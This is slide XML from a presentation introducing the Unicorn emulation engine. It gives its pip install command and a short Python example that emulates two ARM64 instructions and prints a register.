            <a:ext cx="10370118" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Unicorn Engine</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCE338B-1B4B-49BE-A06F-0950AA054363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="922419" y="1874739"/>
            <a:ext cx="10230855" cy="2743315"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Unicorn engine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is an emulation engine.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>With Unicorn Engine, we can emulate any CPU code that it supports.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In other words, we can “execute” instructions that our CPU might not support.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:lnSpc>
                <a:spcPct val="250000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unicorn engine can be installed with pip.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="TextBox 11" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A079B882-E8BD-4905-829B-E32F05F0F7BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801584" y="4756671"/>
            <a:ext cx="4730184"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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>pip install unicorn</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188636120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20780" y="0"/>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199</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4372577" y="597103"/>
            <a:ext cx="3985360" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>Unicorn Engine (cont.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BCE338B-1B4B-49BE-A06F-0950AA054363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219124" y="1097211"/>
            <a:ext cx="10230855" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Example of emulating ARM64 instructions on unicorn-engine:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6" descr="Interactive interpreter">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D91C4C9B-E90E-41F0-A2A7-0BA77112F4CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="659183" y="1504986"/>
            <a:ext cx="11145252" cy="44935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300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>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binascii</a:t>
            </a:r>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import</a:t>
            </a:r>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unhexlify</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300" b="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="D4D4D4"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> unicorn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> unicorn.arm64_const </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>import</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># ARM64 code to be emulated </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ARM64_CODE  = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"a0008052"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># mov w0, #0x5</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ARM64_CODE += </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"2000000b"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># add w0, w1, w0</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ARM64_CODE = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unhexlify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ARM64_CODE.encode())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># memory address where emulation starts </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ADDRESS = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1000000</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Emulate ARM64 code"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C586C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    mu = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Uc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UC_ARCH_ARM64, UC_MODE_ARM)  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># Initialize emulator in ARM64 (AARCH64) mode </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mu.mem_map</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (ADDRESS, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1024</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># map 2MB memory for this emulation</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mu.mem_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ADDRESS, ARM64_CODE) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># write machine code to be emulated to memory</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mu.reg_write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UC_ARM64_REG_W1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B5CEA8"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># initialize machine registers</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mu.emu_start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ADDRESS, ADDRESS + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(ARM64_CODE))  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># emulate code in infinite time &amp; unlimited instructions</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a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"Emulation done. Below is the CPU context"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="6A9955"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t># now print out some registers</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r_W0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mu.reg_read</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(UC_ARM64_REG_W0)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>print</a:t>
            </a:r>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f</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"W0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DCDCAA"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(r_W0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="569CD6"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="CE9178"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="en-US" sz="1300" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D4D4D4"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
